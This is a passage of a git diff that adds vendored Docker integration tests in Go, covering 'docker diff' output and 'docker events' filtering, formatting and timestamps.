sc.Scan() { + line := sc.Text() + if strings.Contains(line, mountpoint) { + c.Fatalf("mountinfo should not include the mountpoint of stop container") + } + } + + out, err = s.d.Cmd("rm", "top") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go new file mode 100644 index 0000000000..08cf6e1caa --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go @@ -0,0 +1,98 @@ +package main + +import ( + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// ensure that an added file shows up in docker diff +func (s *DockerSuite) TestDiffFilenameShownInOutput(c *check.C) { + containerCmd := `mkdir /foo; echo xyzzy > /foo/bar` + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", containerCmd) + + // Wait for it to exit as cannot diff a running container on Windows, and + // it will take a few seconds to exit. Also there's no way in Windows to + // differentiate between an Add or a Modify, and all files are under + // a "Files/" prefix. + containerID := strings.TrimSpace(out) + lookingFor := "A /foo/bar" + if daemonPlatform == "windows" { + err := waitExited(containerID, 60*time.Second) + c.Assert(err, check.IsNil) + lookingFor = "C Files/foo/bar" + } + + cleanCID := strings.TrimSpace(out) + out, _ = dockerCmd(c, "diff", cleanCID) + + found := false + for _, line := range strings.Split(out, "\n") { + if strings.Contains(line, lookingFor) { + found = true + break + } + } + c.Assert(found, checker.True) +} + +// test to ensure GH #3840 doesn't occur any more +func (s *DockerSuite) TestDiffEnsureInitLayerFilesAreIgnored(c *check.C) { + testRequires(c, DaemonIsLinux) + // this is a list of files which shouldn't show up in `docker diff` + initLayerFiles := []string{"/etc/resolv.conf", "/etc/hostname", "/etc/hosts", "/.dockerenv"} + containerCount := 5 + + // we might not run into this problem from the first run, so start a few containers + for i := 0; i < containerCount; i++ { + containerCmd := `echo foo > /root/bar` + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", containerCmd) + + cleanCID := strings.TrimSpace(out) + out, _ = dockerCmd(c, "diff", cleanCID) + + for _, filename := range initLayerFiles { + c.Assert(out, checker.Not(checker.Contains), filename) + } + } +} + +func (s *DockerSuite) TestDiffEnsureDefaultDevs(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "sleep", "0") + + cleanCID := strings.TrimSpace(out) + out, _ = dockerCmd(c, "diff", cleanCID) + + expected := map[string]bool{ + "C /dev": true, + "A /dev/full": true, // busybox + "C /dev/ptmx": true, // libcontainer + "A /dev/mqueue": true, + "A /dev/kmsg": true, + "A /dev/fd": true, + "A /dev/ptmx": true, + "A /dev/null": true, + "A /dev/random": true, + "A /dev/stdout": true, + "A /dev/stderr": true, + "A /dev/tty1": true, + "A /dev/stdin": true, + "A /dev/tty": true, + "A /dev/urandom": true, + "A /dev/zero": true, + } + + for _, line := range strings.Split(out, "\n") { + c.Assert(line == "" || expected[line], checker.True, check.Commentf(line)) + } +} + +// https://github.com/docker/docker/pull/14381#discussion_r33859347 +func (s *DockerSuite) TestDiffEmptyArgClientError(c *check.C) { + out, _, err := dockerCmdWithError("diff", "") + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Contains, "Container name cannot be empty") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go new file mode 100644 index 0000000000..1fbfc742de --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go @@ -0,0 +1,794 @@ +package main + +import ( + "bufio" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net/http" + "os" + "os/exec" + "strings" + "time" + + eventtypes "github.com/docker/docker/api/types/events" + eventstestutils "github.com/docker/docker/daemon/events/testutils" + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestEventsTimestampFormats(c *check.C) { + name := "events-time-format-test" + + // Start stopwatch, generate an event + start := daemonTime(c) + time.Sleep(1100 * time.Millisecond) // so that first event occur in different second from since (just for the case) + dockerCmd(c, "run", "--rm", "--name", name, "busybox", "true") + time.Sleep(1100 * time.Millisecond) // so that until > since + end := daemonTime(c) + + // List of available time formats to --since + unixTs := func(t time.Time) string { return fmt.Sprintf("%v", t.Unix()) } + rfc3339 := func(t time.Time) string { return t.Format(time.RFC3339) } + duration := func(t time.Time) string { return time.Now().Sub(t).String() } + + // --since=$start must contain only the 'untag' event + for _, f := range []func(time.Time) string{unixTs, rfc3339, duration} { + since, until := f(start), f(end) + out, _ := dockerCmd(c, "events", "--since="+since, "--until="+until) + events := strings.Split(out, "\n") + events = events[:len(events)-1] + + nEvents := len(events) + c.Assert(nEvents, checker.GreaterOrEqualThan, 5) //Missing expected event + containerEvents := eventActionsByIDAndType(c, events, name, "container") + c.Assert(containerEvents, checker.HasLen, 5, check.Commentf("events: %v", events)) + + c.Assert(containerEvents[0], checker.Equals, "create", check.Commentf(out)) + c.Assert(containerEvents[1], checker.Equals, "attach", check.Commentf(out)) + c.Assert(containerEvents[2], checker.Equals, "start", check.Commentf(out)) + c.Assert(containerEvents[3], checker.Equals, "die", check.Commentf(out)) + c.Assert(containerEvents[4], checker.Equals, "destroy", check.Commentf(out)) + } +} + +func (s *DockerSuite) TestEventsUntag(c *check.C) { + image := "busybox" + dockerCmd(c, "tag", image, "utest:tag1") + dockerCmd(c, "tag", image, "utest:tag2") + dockerCmd(c, "rmi", "utest:tag1") + dockerCmd(c, "rmi", "utest:tag2") + + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "events", "--since=1"}, + Timeout: time.Millisecond * 2500, + }) + c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true}) + + events := strings.Split(result.Stdout(), "\n") + nEvents := len(events) + // The last element after the split above will be an empty string, so we + // get the two elements before the last, which are the untags we're + // looking for. + for _, v := range events[nEvents-3 : nEvents-1] { + c.Assert(v, checker.Contains, "untag", check.Commentf("event should be untag")) + } +} + +func (s *DockerSuite) TestEventsLimit(c *check.C) { + // Limit to 8 goroutines creating containers in order to prevent timeouts + // creating so many containers simultaneously on Windows + sem := make(chan bool, 8) + numContainers := 17 + errChan := make(chan error, numContainers) + + args := []string{"run", "--rm", "busybox", "true"} + for i := 0; i < numContainers; i++ { + sem <- true + go func() { + defer func() { <-sem }() + out, err := exec.Command(dockerBinary, args...).CombinedOutput() + if err != nil { + err = fmt.Errorf("%v: %s", err, string(out)) + } + errChan <- err + }() + } + + // Wait for all goroutines to finish + for i := 0; i < cap(sem); i++ { + sem <- true + } + close(errChan) + + for err := range errChan { + c.Assert(err, checker.IsNil, check.Commentf("%q failed with error", strings.Join(args, " "))) + } + + out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c)) + events := strings.Split(out, "\n") + nEvents := len(events) - 1 + c.Assert(nEvents, checker.Equals, 64, check.Commentf("events should be limited to 64, but received %d", nEvents)) +} + +func (s *DockerSuite) TestEventsContainerEvents(c *check.C) { + dockerCmd(c, "run", "--rm", "--name", "container-events-test", "busybox", "true") + + out, _ := dockerCmd(c, "events", "--until", daemonUnixTime(c)) + events := strings.Split(out, "\n") + events = events[:len(events)-1] + + nEvents := len(events) + c.Assert(nEvents, checker.GreaterOrEqualThan, 5) //Missing expected event + containerEvents := eventActionsByIDAndType(c, events, "container-events-test", "container") + c.Assert(containerEvents, checker.HasLen, 5, check.Commentf("events: %v", events)) + + c.Assert(containerEvents[0], checker.Equals, "create", check.Commentf(out)) + c.Assert(containerEvents[1], checker.Equals, "attach", check.Commentf(out)) + c.Assert(containerEvents[2], checker.Equals, "start", check.Commentf(out)) + c.Assert(containerEvents[3], checker.Equals, "die", check.Commentf(out)) + c.Assert(containerEvents[4], checker.Equals, "destroy", check.Commentf(out)) +} + +func (s *DockerSuite) TestEventsContainerEventsAttrSort(c *check.C) { + since := daemonUnixTime(c) + dockerCmd(c, "run", "--rm", "--name", "container-events-test", "busybox", "true") + + out, _ := dockerCmd(c, "events", "--filter", "container=container-events-test", "--since", since, "--until", daemonUnixTime(c)) + events := strings.Split(out, "\n") + + nEvents := len(events) + c.Assert(nEvents, checker.GreaterOrEqualThan, 3) //Missing expected event + matchedEvents := 0 + for _, event := range events { + matches := eventstestutils.ScanMap(event) + if matches["eventType"] == "container" && matches["action"] == "create" { + matchedEvents++ + c.Assert(out, checker.Contains, "(image=busybox, name=container-events-test)", check.Commentf("Event attributes not sorted")) + } else if matches["eventType"] == "container" && matches["action"] == "start" { + matchedEvents++ + c.Assert(out, checker.Contains, "(image=busybox, name=container-events-test)", check.Commentf("Event attributes not sorted")) + } + } + c.Assert(matchedEvents, checker.Equals, 2, check.Commentf("missing events for container container-events-test:\n%s", out)) +} + +func (s *DockerSuite) TestEventsContainerEventsSinceUnixEpoch(c *check.C) { + dockerCmd(c, "run", "--rm", "--name", "since-epoch-test", "busybox", "true") + timeBeginning := time.Unix(0, 0).Format(time.RFC3339Nano) + timeBeginning = strings.Replace(timeBeginning, "Z", ".000000000Z", -1) + out, _ := dockerCmd(c, "events", "--since", timeBeginning, "--until", daemonUnixTime(c)) + events := strings.Split(out, "\n") + events = events[:len(events)-1] + + nEvents := len(events) + c.Assert(nEvents, checker.GreaterOrEqualThan, 5) //Missing expected event + containerEvents := eventActionsByIDAndType(c, events, "since-epoch-test", "container") + c.Assert(containerEvents, checker.HasLen, 5, check.Commentf("events: %v", events)) + + c.Assert(containerEvents[0], checker.Equals, "create", check.Commentf(out)) + c.Assert(containerEvents[1], checker.Equals, "attach", check.Commentf(out)) + c.Assert(containerEvents[2], checker.Equals, "start", check.Commentf(out)) + c.Assert(containerEvents[3], checker.Equals, "die", check.Commentf(out)) + c.Assert(containerEvents[4], checker.Equals, "destroy", check.Commentf(out)) +} + +func (s *DockerSuite) TestEventsImageTag(c *check.C) { + time.Sleep(1 * time.Second) // because API has seconds granularity + since := daemonUnixTime(c) + image := "testimageevents:tag" + dockerCmd(c, "tag", "busybox", image) + + out, _ := dockerCmd(c, "events", + "--since", since, "--until", daemonUnixTime(c)) + + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(events, checker.HasLen, 1, check.Commentf("was expecting 1 event. out=%s", out)) + event := strings.TrimSpace(events[0]) + + matches := eventstestutils.ScanMap(event) + c.Assert(matchEventID(matches, image), checker.True, check.Commentf("matches: %v\nout:\n%s", matches, out)) + c.Assert(matches["action"], checker.Equals, "tag") +} + +func (s *DockerSuite) TestEventsImagePull(c *check.C) { + // TODO Windows: Enable this test once pull and reliable image names are available + testRequires(c, DaemonIsLinux) + since := daemonUnixTime(c) + testRequires(c, Network) + + dockerCmd(c, "pull", "hello-world") + + out, _ := dockerCmd(c, "events", + "--since", since, "--until", daemonUnixTime(c)) + + events := strings.Split(strings.TrimSpace(out), "\n") + event := strings.TrimSpace(events[len(events)-1]) + matches := eventstestutils.ScanMap(event) + c.Assert(matches["id"], checker.Equals, "hello-world:latest") + c.Assert(matches["action"], checker.Equals, "pull") + +} + +func (s *DockerSuite) TestEventsImageImport(c *check.C) { + // TODO Windows CI. This should be portable once export/import are + // more reliable (@swernli) + testRequires(c, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + cleanedContainerID := strings.TrimSpace(out) + + since := daemonUnixTime(c) + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "export", cleanedContainerID), + exec.Command(dockerBinary, "import", "-"), + ) + c.Assert(err, checker.IsNil, check.Commentf("import failed with output: %q", out)) + imageRef := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--filter", "event=import") + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(events, checker.HasLen, 1) + matches := eventstestutils.ScanMap(events[0]) + c.Assert(matches["id"], checker.Equals, imageRef, check.Commentf("matches: %v\nout:\n%s\n", matches, out)) + c.Assert(matches["action"], checker.Equals, "import", check.Commentf("matches: %v\nout:\n%s\n", matches, out)) +} + +func (s *DockerSuite) TestEventsImageLoad(c *check.C) { + testRequires(c, DaemonIsLinux) + myImageName := "footest:v1" + dockerCmd(c, "tag", "busybox", myImageName) + since := daemonUnixTime(c) + + out, _ := dockerCmd(c, "images", "-q", "--no-trunc", myImageName) + longImageID := strings.TrimSpace(out) + c.Assert(longImageID, checker.Not(check.Equals), "", check.Commentf("Id should not be empty")) + + dockerCmd(c, "save", "-o", "saveimg.tar", myImageName) + dockerCmd(c, "rmi", myImageName) + out, _ = dockerCmd(c, "images", "-q", myImageName) + noImageID := strings.TrimSpace(out) + c.Assert(noImageID, checker.Equals, "", check.Commentf("Should not have any image")) + dockerCmd(c, "load", "-i", "saveimg.tar") + + result := icmd.RunCommand("rm", "-rf", "saveimg.tar") + c.Assert(result, icmd.Matches, icmd.Success) + + out, _ = dockerCmd(c, "images", "-q", "--no-trunc", myImageName) + imageID := strings.TrimSpace(out) + c.Assert(imageID, checker.Equals, longImageID, check.Commentf("Should have same image id as before")) + + out, _ = dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--filter", "event=load") + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(events, checker.HasLen, 1) + matches := eventstestutils.ScanMap(events[0]) + c.Assert(matches["id"], checker.Equals, imageID, check.Commentf("matches: %v\nout:\n%s\n", matches, out)) + c.Assert(matches["action"], checker.Equals, "load", check.Commentf("matches: %v\nout:\n%s\n", matches, out)) + + out, _ = dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--filter", "event=save") + events = strings.Split(strings.TrimSpace(out), "\n") + c.Assert(events, checker.HasLen, 1) + matches = eventstestutils.ScanMap(events[0]) + c.Assert(matches["id"], checker.Equals, imageID, check.Commentf("matches: %v\nout:\n%s\n", matches, out)) + c.Assert(matches["action"], checker.Equals, "save", check.Commentf("matches: %v\nout:\n%s\n", matches, out)) +} + +func (s *DockerSuite) TestEventsPluginOps(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + + since := daemonUnixTime(c) + + dockerCmd(c, "plugin", "install", pNameWithTag, "--grant-all-permissions") + dockerCmd(c, "plugin", "disable", pNameWithTag) + dockerCmd(c, "plugin", "remove", pNameWithTag) + + out, _ := dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c)) + events := strings.Split(out, "\n") + events = events[:len(events)-1] + + nEvents := len(events) + c.Assert(nEvents, checker.GreaterOrEqualThan, 4) + + pluginEvents := eventActionsByIDAndType(c, events, pNameWithTag, "plugin") + c.Assert(pluginEvents, checker.HasLen, 4, check.Commentf("events: %v", events)) + + c.Assert(pluginEvents[0], checker.Equals, "pull", check.Commentf(out)) + c.Assert(pluginEvents[1], checker.Equals, "enable", check.Commentf(out)) + c.Assert(pluginEvents[2], checker.Equals, "disable", check.Commentf(out)) + c.Assert(pluginEvents[3], checker.Equals, "remove", check.Commentf(out)) +} + +func (s *DockerSuite) TestEventsFilters(c *check.C) { + since := daemonUnixTime(c) + dockerCmd(c, "run", "--rm", "busybox", "true") + dockerCmd(c, "run", "--rm", "busybox", "true") + out, _ := dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--filter", "event=die") + parseEvents(c, out, "die") + + out, _ = dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--filter", "event=die", "--filter", "event=start") + parseEvents(c, out, "die|start") + + // make sure we at least got 2 start events + count := strings.Count(out, "start") + c.Assert(strings.Count(out, "start"), checker.GreaterOrEqualThan, 2, check.Commentf("should have had 2 start events but had %d, out: %s", count, out)) + +} + +func (s *DockerSuite) TestEventsFilterImageName(c *check.C) { + since := daemonUnixTime(c) + + out, _ := dockerCmd(c, "run", "--name", "container_1", "-d", "busybox:latest", "true") + container1 := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "run", "--name", "container_2", "-d", "busybox", "true") + container2 := strings.TrimSpace(out) + + name := "busybox" + out, _ = dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--filter", fmt.Sprintf("image=%s", name)) + events := strings.Split(out, "\n") + events = events[:len(events)-1] + c.Assert(events, checker.Not(checker.HasLen), 0) //Expected events but found none for the image busybox:latest + count1 := 0 + count2 := 0 + + for _, e := range events { + if strings.Contains(e, container1) { + count1++ + } else if strings.Contains(e, container2) { + count2++ + } + } + c.Assert(count1, checker.Not(checker.Equals), 0, check.Commentf("Expected event from container but got %d from %s", count1, container1)) + c.Assert(count2, checker.Not(checker.Equals), 0, check.Commentf("Expected event from container but got %d from %s", count2, container2)) + +} + +func (s *DockerSuite) TestEventsFilterLabels(c *check.C) { + since := daemonUnixTime(c) + label := "io.docker.testing=foo" + + out, _ := dockerCmd(c, "run", "-d", "-l", label, "busybox:latest", "true") + container1 := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "run", "-d", "busybox", "true") + container2 := strings.TrimSpace(out) + + out, _ = dockerCmd( + c, + "events", + "--since", since, + "--until", daemonUnixTime(c), + "--filter", fmt.Sprintf("label=%s", label)) + + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(events), checker.Equals, 3) + + for _, e := range events { + c.Assert(e, checker.Contains, container1) + c.Assert(e, checker.Not(checker.Contains), container2) + } +} + +func (s *DockerSuite) TestEventsFilterImageLabels(c *check.C) { + since := daemonUnixTime(c) + name := "labelfiltertest" + label := "io.docker.testing=image" + + // Build a test image. + _, err := buildImage(name, fmt.Sprintf(` + FROM busybox:latest + LABEL %s`, label), true) + c.Assert(err, checker.IsNil, check.Commentf("Couldn't create image")) + + dockerCmd(c, "tag", name, "labelfiltertest:tag1") + dockerCmd(c, "tag", name, "labelfiltertest:tag2") + dockerCmd(c, "tag", "busybox:latest", "labelfiltertest:tag3") + + out, _ := dockerCmd( + c, + "events", + "--since", since, + "--until", daemonUnixTime(c), + "--filter", fmt.Sprintf("label=%s", label), + "--filter", "type=image") + + events := strings.Split(strings.TrimSpace(out), "\n") + + // 2 events from the "docker tag" command, another one is from "docker build" + c.Assert(events, checker.HasLen, 3, check.Commentf("Events == %s", events)) + for _, e := range events { + c.Assert(e, checker.Contains, "labelfiltertest") + } +} + +func (s *DockerSuite) TestEventsFilterContainer(c *check.C) { + since := daemonUnixTime(c) + nameID := make(map[string]string) + + for _, name := range []string{"container_1", "container_2"} { + dockerCmd(c, "run", "--name", name, "busybox", "true") + id := inspectField(c, name, "Id") + nameID[name] = id + } + + until := daemonUnixTime(c) + + checkEvents := func(id string, events []string) error { + if len(events) != 4 { // create, attach, start, die + return fmt.Errorf("expected 4 events, got %v", events) + } + for _, event := range events { + matches := eventstestutils.ScanMap(event) + if !matchEventID(matches, id) { + return fmt.Errorf("expected event for container id %s: %s - parsed container id: %s", id, event, matches["id"]) + } + } + return nil + } + + for name, ID := range nameID { + // filter by names + out, _ := dockerCmd(c, "events", "--since", since, "--until", until, "--filter", "container="+name) + events := strings.Split(strings.TrimSuffix(out, "\n"), "\n") + c.Assert(checkEvents(ID, events), checker.IsNil) + + // filter by ID's + out, _ = dockerCmd(c, "events", "--since", since, "--until", until, "--filter", "container="+ID) + events = strings.Split(strings.TrimSuffix(out, "\n"), "\n") + c.Assert(checkEvents(ID, events), checker.IsNil) + } +} + +func (s *DockerSuite) TestEventsCommit(c *check.C) { + // Problematic on Windows as cannot commit a running container + testRequires(c, DaemonIsLinux) + + out, _ := runSleepingContainer(c) + cID := strings.TrimSpace(out) + c.Assert(waitRun(cID), checker.IsNil) + + dockerCmd(c, "commit", "-m", "test", cID) + dockerCmd(c, "stop", cID) + c.Assert(waitExited(cID, 5*time.Second), checker.IsNil) + + until := daemonUnixTime(c) + out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until="+until) + c.Assert(out, checker.Contains, "commit", check.Commentf("Missing 'commit' log event")) +} + +func (s *DockerSuite) TestEventsCopy(c *check.C) { + // Build a test image. + id, err := buildImage("cpimg", ` + FROM busybox + RUN echo HI > /file`, true) + c.Assert(err, checker.IsNil, check.Commentf("Couldn't create image")) + + // Create an empty test file. + tempFile, err := ioutil.TempFile("", "test-events-copy-") + c.Assert(err, checker.IsNil) + defer os.Remove(tempFile.Name()) + + c.Assert(tempFile.Close(), checker.IsNil) + + dockerCmd(c, "create", "--name=cptest", id) + + dockerCmd(c, "cp", "cptest:/file", tempFile.Name()) + + until := daemonUnixTime(c) + out, _ := dockerCmd(c, "events", "--since=0", "-f", "container=cptest", "--until="+until) + c.Assert(out, checker.Contains, "archive-path", check.Commentf("Missing 'archive-path' log event\n")) + + dockerCmd(c, "cp", tempFile.Name(), "cptest:/filecopy") + + until = daemonUnixTime(c) + out, _ = dockerCmd(c, "events", "-f", "container=cptest", "--until="+until) + c.Assert(out, checker.Contains, "extract-to-dir", check.Commentf("Missing 'extract-to-dir' log event")) +} + +func (s *DockerSuite) TestEventsResize(c *check.C) { + out, _ := runSleepingContainer(c, "-d") + cID := strings.TrimSpace(out) + c.Assert(waitRun(cID), checker.IsNil) + + endpoint := "/containers/" + cID + "/resize?h=80&w=24" + status, _, err := sockRequest("POST", endpoint, nil) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "stop", cID) + + until := daemonUnixTime(c) + out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until="+until) + c.Assert(out, checker.Contains, "resize", check.Commentf("Missing 'resize' log event")) +} + +func (s *DockerSuite) TestEventsAttach(c *check.C) { + // TODO Windows CI: Figure out why this test fails intermittently (TP5). + testRequires(c, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-di", "busybox", "cat") + cID := strings.TrimSpace(out) + c.Assert(waitRun(cID), checker.IsNil) + + cmd := exec.Command(dockerBinary, "attach", cID) + stdin, err := cmd.StdinPipe() + c.Assert(err, checker.IsNil) + defer stdin.Close() + stdout, err := cmd.StdoutPipe() + c.Assert(err, checker.IsNil) + defer stdout.Close() + c.Assert(cmd.Start(), checker.IsNil) + defer cmd.Process.Kill() + + // Make sure we're done attaching by writing/reading some stuff + _, err = stdin.Write([]byte("hello\n")) + c.Assert(err, checker.IsNil) + out, err = bufio.NewReader(stdout).ReadString('\n') + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "hello", check.Commentf("expected 'hello'")) + + c.Assert(stdin.Close(), checker.IsNil) + + dockerCmd(c, "kill", cID) + c.Assert(waitExited(cID, 5*time.Second), checker.IsNil) + + until := daemonUnixTime(c) + out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until="+until) + c.Assert(out, checker.Contains, "attach", check.Commentf("Missing 'attach' log event")) +} + +func (s *DockerSuite) TestEventsRename(c *check.C) { + out, _ := dockerCmd(c, "run", "--name", "oldName", "busybox", "true") + cID := strings.TrimSpace(out) + dockerCmd(c, "rename", "oldName", "newName") + + until := daemonUnixTime(c) + // filter by the container id because the name in the event will be the new name. + out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until", until) + c.Assert(out, checker.Contains, "rename", check.Commentf("Missing 'rename' log event\n")) +} + +func (s *DockerSuite) TestEventsTop(c *check.C) { + // Problematic on Windows as Windows does not support top + testRequires(c, DaemonIsLinux) + + out, _ := runSleepingContainer(c, "-d") + cID := strings.TrimSpace(out) + c.Assert(waitRun(cID), checker.IsNil) + + dockerCmd(c, "top", cID) + dockerCmd(c, "stop", cID) + + until := daemonUnixTime(c) + out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until="+until) + c.Assert(out, checker.Contains, " top", check.Commentf("Missing 'top' log event")) +} + +// #14316 +func (s *DockerRegistrySuite) TestEventsImageFilterPush(c *check.C) { + // Problematic to port for Windows CI during TP5 timeframe until + // supporting push + testRequires(c, DaemonIsLinux) + testRequires(c, Network) + repoName := fmt.Sprintf("%v/dockercli/testf", privateRegistryURL) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + cID := strings.TrimSpace(out) + c.Assert(waitRun(cID), checker.IsNil) + + dockerCmd(c, "commit", cID, repoName) + dockerCmd(c, "stop", cID) + dockerCmd(c, "push", repoName) + + until := daemonUnixTime(c) + out, _ = dockerCmd(c, "events", "-f", "image="+repoName, "-f", "event=push", "--until", until) + c.Assert(out, checker.Contains, repoName, check.Commentf("Missing 'push' log event for %s", repoName)) +} + +func (s *DockerSuite) TestEventsFilterType(c *check.C) { + since := daemonUnixTime(c) + name := "labelfiltertest" + label := "io.docker.testing=image" + + // Build a test image. + _, err := buildImage(name, fmt.Sprintf(` + FROM busybox:latest + LABEL %s`, label), true) + c.Assert(err, checker.IsNil, check.Commentf("Couldn't create image")) + + dockerCmd(c, "tag", name, "labelfiltertest:tag1") + dockerCmd(c, "tag", name, "labelfiltertest:tag2") + dockerCmd(c, "tag", "busybox:latest", "labelfiltertest:tag3") + + out, _ := dockerCmd( + c, + "events", + "--since", since, + "--until", daemonUnixTime(c), + "--filter", fmt.Sprintf("label=%s", label), + "--filter", "type=image") + + events := strings.Split(strings.TrimSpace(out), "\n") + + // 2 events from the "docker tag" command, another one is from "docker build" + c.Assert(events, checker.HasLen, 3, check.Commentf("Events == %s", events)) + for _, e := range events { + c.Assert(e, checker.Contains, "labelfiltertest") + } + + out, _ = dockerCmd( + c, + "events", + "--since", since, + "--until", daemonUnixTime(c), + "--filter", fmt.Sprintf("label=%s", label), + "--filter", "type=container") + events = strings.Split(strings.TrimSpace(out), "\n") + + // Events generated by the container that builds the image + c.Assert(events, checker.HasLen, 3, check.Commentf("Events == %s", events)) + + out, _ = dockerCmd( + c, + "events", + "--since", since, + "--until", daemonUnixTime(c), + "--filter", "type=network") + events = strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(events), checker.GreaterOrEqualThan, 1, check.Commentf("Events == %s", events)) +} + +// #25798 +func (s *DockerSuite) TestEventsSpecialFiltersWithExecCreate(c *check.C) { + since := daemonUnixTime(c) + runSleepingContainer(c, "--name", "test-container", "-d") + waitRun("test-container") + + dockerCmd(c, "exec", "test-container", "echo", "hello-world") + + out, _ := dockerCmd( + c, + "events", + "--since", since, + "--until", daemonUnixTime(c), + "--filter", + "event='exec_create: echo hello-world'", + ) + + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(events), checker.Equals, 1, check.Commentf(out)) + + out, _ = dockerCmd( + c, + "events", + "--since", since, + "--until", daemonUnixTime(c), + "--filter", + "event=exec_create", + ) + c.Assert(len(events), checker.Equals, 1, check.Commentf(out)) +} + +func (s *DockerSuite) TestEventsFilterImageInContainerAction(c *check.C) { + since := daemonUnixTime(c) + dockerCmd(c, "run", "--name", "test-container", "-d", "busybox", "true") + waitRun("test-container") + + out, _ := dockerCmd(c, "events", "--filter", "image=busybox", "--since", since, "--until", daemonUnixTime(c)) + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(events), checker.GreaterThan, 1, check.Commentf(out)) +} + +func (s *DockerSuite) TestEventsContainerRestart(c *check.C) { + dockerCmd(c, "run", "-d", "--name=testEvent", "--restart=on-failure:3", "busybox", "false") + + // wait until test2 is auto removed. + waitTime := 10 * time.Second + if daemonPlatform == "windows" { + // Windows takes longer... + waitTime = 90 * time.Second + } + + err := waitInspect("testEvent", "{{ .State.Restarting }} {{ .State.Running }}", "false false", waitTime) + c.Assert(err, checker.IsNil) + + var ( + createCount int + startCount int + dieCount int + ) + out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c), "-f", "container=testEvent") + events := strings.Split(strings.TrimSpace(out), "\n") + + nEvents := len(events) + c.Assert(nEvents, checker.GreaterOrEqualThan, 1) //Missing expected event + actions := eventActionsByIDAndType(c, events, "testEvent", "container") + + for _, a := range actions { + switch a { + case "create": + createCount++ + case "start": + startCount++ + case "die": + dieCount++ + } + } + c.Assert(createCount, checker.Equals, 1, check.Commentf("testEvent should be created 1 times: %v", actions)) + c.Assert(startCount, checker.Equals, 4, check.Commentf("testEvent should start 4 times: %v", actions)) + c.Assert(dieCount, checker.Equals, 4, check.Commentf("testEvent should die 4 times: %v", actions)) +} + +func (s *DockerSuite) TestEventsSinceInTheFuture(c *check.C) { + dockerCmd(c, "run", "--name", "test-container", "-d", "busybox", "true") + waitRun("test-container") + + since := daemonTime(c) + until := since.Add(time.Duration(-24) * time.Hour) + out, _, err := dockerCmdWithError("events", "--filter", "image=busybox", "--since", parseEventTime(since), "--until", parseEventTime(until)) + + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "cannot be after `until`") +} + +func (s *DockerSuite) TestEventsUntilInThePast(c *check.C) { + since := daemonUnixTime(c) + + dockerCmd(c, "run", "--name", "test-container", "-d", "busybox", "true") + waitRun("test-container") + + until := daemonUnixTime(c) + + dockerCmd(c, "run", "--name", "test-container2", "-d", "busybox", "true") + waitRun("test-container2") + + out, _ := dockerCmd(c, "events", "--filter", "image=busybox", "--since", since, "--until", until) + + c.Assert(out, checker.Not(checker.Contains), "test-container2") + c.Assert(out, checker.Contains, "test-container") +} + +func (s *DockerSuite) TestEventsFormat(c *check.C) { + since := daemonUnixTime(c) + dockerCmd(c, "run", "--rm", "busybox", "true") + dockerCmd(c, "run", "--rm", "busybox", "true") + out, _ := dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--format", "{{json .}}") + dec := json.NewDecoder(strings.NewReader(out)) + // make sure we got 2 start events + startCount := 0 + for { + var err error + var ev eventtypes.Message + if err = dec.Decode(&ev); err == io.EOF { + break + } + c.Assert(err, checker.IsNil) + if ev.Status == "start" { + startCount++ + } + } + + c.Assert(startCount, checker.Equals, 2, check.Commentf("should have had 2 start events but had %d, out: %s", startCount, out)) +} + +func (s *DockerSuite) TestEventsFormatBadFunc(c *check.C) { + // make sure it fails immediately, without receiving any event + result 